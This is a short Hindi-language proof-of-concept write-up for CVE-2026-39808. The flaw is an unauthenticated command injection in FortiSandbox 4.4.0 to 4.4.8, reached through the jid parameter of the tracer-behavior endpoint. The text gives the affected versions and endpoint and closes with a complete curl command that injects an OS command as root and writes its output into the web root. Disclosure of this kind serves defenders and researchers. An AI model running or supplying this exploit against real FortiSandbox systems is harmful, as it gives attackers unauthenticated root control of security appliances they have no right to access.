
CVE-2026-39808 के माध्यम से FortiSandbox में अनप्रमाणित RCE के लिए PoC
नवंबर 2025 में, Fortinet के FortiSandbox में एक गंभीर कमजोरी खोजी गई थी जिसने एक अप्रमाणिक हमलावर को अंतर्निहित OS में रूट के रूप में कमांड निष्पादित करने की अनुमति दी। इस कमजोरी को पैच किया गया और अंततः अप्रैल 2026 में सार्वजनिक किया गया।
यह कमजोरी FortiSandbox संस्करण 4.4.0 से 4.4.8 को प्रभावित करती है।
पूरी सलाह यहाँ पढ़ें।
यह कमजोरी /fortisandbox/job-detail/tracer-behavior एंडपॉइंट को प्रभावित करती है। jid GET पैरामीटर पर पाइप प्रतीक (|) का उपयोग करके OS कमांड इंजेक्ट किए जा सकते हैं।
उपरोक्त उदाहरण में, आउटपुट को वेब रूट में एक फ़ाइल में पुनर्निर्देशित किया गया था, ताकि बाद में इसे प्राप्त किया जा सके।
एक सरल curl कमांड बिना किसी पूर्व प्रमाणीकरण के रूट के रूप में RCE प्राप्त करने के लिए पर्याप्त है:
curl -s -k --get "http://$HOST/fortisandbox/job-detail/tracer-behavior" --data-urlencode "jid=|(id > /web/ng/out.txt)|"